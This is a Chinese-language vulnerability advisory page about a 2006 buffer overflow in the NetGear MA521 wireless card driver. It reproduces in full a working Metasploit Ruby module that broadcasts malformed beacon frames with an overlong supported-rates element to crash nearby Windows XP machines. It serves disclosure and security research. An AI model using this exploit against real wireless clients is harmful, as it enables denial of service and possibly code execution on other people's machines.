 |
NetGear MA521无线驱动超长Rates溢出漏洞 |
|
|
| NetGear MA521无线驱动超长Rates溢出漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:11:26 |
|
2006-11-20 23:58:35
发布日期:2006-11-18
更新日期:2006-11-20
受影响系统:Netgear MA521 描述:
BUGTRAQ ID: 21175
NetGear MA521是一款802.11b无线PC网卡。
NetGear MA521的驱动程序在处理畸形帧时存在漏洞,远程攻击可能利用此漏洞在用户机器上执行任意指令。
如果在积极扫描模式下接收到了畸形帧(信标或探测响应)的话,MA521的MA521nd5.SYS驱动就会试图写入攻击者所控制的内存位置。远程攻击者可以通过发送有无效rates信息单元的报文来触发缓冲区溢出,导致执行任意代码。
<*来源:Laurent Butti (laurent.butti@orange-ftgroup.com)
H D Moore (hdm@metasploit.com)
链接:http://projects.info-pull.com/mokb/MOKB-18-11-2006.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! require 'msf/core'
module Msf
class Auxiliary::Dos::Wireless::Netgear_MA521_Rates < Msf::Auxiliary
include Exploit::Lorcon
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear MA521 wireless device
driver under Windows XP. When a specific malformed frame (beacon or probe response)
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
driver attempts to write to an attacker-controlled memory location. The vulnerability
is triggered by an invalid supported rates information element.
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
NetGear MA521 PCMCIA adapter. A remote code execution module is also in development.
This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
], self.class)
end
def run
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Creating malicious beacon frame...")
frame = create_beacon()
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(frame)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
end
print_status("Completed sending #{count} beacons.")
end
def create_beacon
ssid = Rex::Text.rand_text(6)
bssid = Rex::Text.rand_text(6)
channel = datastore['CHANNEL'].to_i
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
# ssid IE
"\x00" + ssid.length.chr + ssid +
# supported rates IE overflow
"\x01" + "\xFF" + ("\x41" * 255) +
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end
end
end
建议:
厂商补丁:
Netgear
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.netgear.com/
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: Biba Selenium Web Server多个远程安全漏洞
下一篇新闻: Comdev One Admin Pro path[docroot]及path[skin]参数文件包含漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
